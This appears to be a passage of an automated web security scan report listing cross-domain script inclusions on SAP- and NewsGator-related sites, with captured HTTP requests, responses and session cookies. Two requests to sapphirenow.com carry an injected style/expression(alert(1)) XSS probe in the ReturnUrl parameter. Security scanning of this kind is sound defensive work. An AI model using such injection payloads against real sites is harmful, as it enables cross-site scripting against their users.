Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; language=en-US; __utma=1.1111194646.1318692406.1318692406.1318692406.1; __utmb=1.1.10.1318692406; __utmc=1; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; Agg1216_SelectedElementId=1; DNNSTUFF_Aggregator=1217=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:26:44 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 76729
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
18.54. http://www.newsgator.com/products/tomoye.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /products/tomoye.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/tomoye.aspx HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; language=en-US; __utma=1.1111194646.1318692406.1318692406.1318692406.1; __utmb=1.1.10.1318692406; __utmc=1; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; Agg1216_SelectedElementId=1; DNNSTUFF_Aggregator=1217=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:29:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 60099
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
18.55. http://www.sapandasug.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapandasug.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.sapandasug.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapphirenow.com/madrid/Overview.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:24:49 GMT
Content-Length: 7194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
18.56. http://www.sapbusinessoptimizer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Home</title>
<meta
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/themes/base/jquery-ui.css" type="text/css" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js"></script>
...[SNIP]...
18.57. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1 HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=jaulcs2tyzxxmgycdn1cnz55; X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; __utma=270210419.1641825112.1318688722.1318688722.1318692187.2; __utmb=270210419.1.10.1318692188; __utmc=270210419; __utmz=270210419.1318692188.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; 37021986-VID=5110247826455; 37021986-SKEY=6638045003516868152; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:28:54 GMT
Content-Length: 42982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?2671fb0a-0fc7-427d-8eb1-44dfead6fa80"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.58. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:43:40 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?55cfaa71-ac24-4d9a-8922-3260827be224"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.59. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=t2xe1y45iffmlseg0oqr4aja

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:03 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?23cad41c-0c85-4300-bd39-4853ff0fe64f"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.60. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=t2xe1y45iffmlseg0oqr4aja

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:58:39 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?fca929c0-0dd1-4c67-8662-b7d0fe230810"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.61. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:58:40 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?04b49c82-f6ef-41fe-8277-7bb397029464"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.62. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx HTTP/1.1
Host: www.sapphirenow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:04:54 GMT
Expires: -1
Pragma: no-cache
Connection: close
X-Powered-By: ASP.NET
Content-Length: 42818


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?638aa0b1-4153-44bb-8a71-96a3acaedefa"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.63. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=t2xe1y45iffmlseg0oqr4aja; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:13 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?11082289-fc6a-412a-85c6-d6bb9fdb83e8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.64. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=t2xe1y45iffmlseg0oqr4aja

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:43:45 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?1771b0a7-e524-401c-8d03-27000b3840f6"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.65. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspxfcf2f%22style%3d%22x%3aexpression(alert(1))%2234bced315ef HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspxfcf2f%22style%3d%22x%3aexpression(alert(1))%2234bced315ef
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=270210419.1641825112.1318688722.1318688722.1318688722.1; __utmz=270210419.1318688724.1.1.utmcsr=sapandasug.com|utmccn=(referral)|utmcmd=referral|utmcct=/; 37021986-VID=5110247826455

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:28:49 GMT
Content-Length: 42972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?bd72f70e-784b-470a-a04f-9eafd0577178"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.66. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?9b8c14c3-b509-4778-9ae5-13b366d5930b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
18.67. http://www.sapphirenow.com/madrid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /madrid/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /madrid/ HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/sapphirenowsaptechedmadrid/ChooseYourExperience..htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 13 Oct 2011 21:38:10 GMT
Accept-Ranges: bytes
ETag: "04dfe66f089cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:23:03 GMT
Content-Length: 32216

...<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta charset="utf-8">
<title>SAPPHIRE NOW ... Madrid</title>
<!--banner slider scrip
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=sapglobalmarketing"></script>
...[SNIP]...
</a><script type="text/javascript" src="//platform.twitter.com/widgets.js"></script>
...[SNIP]...
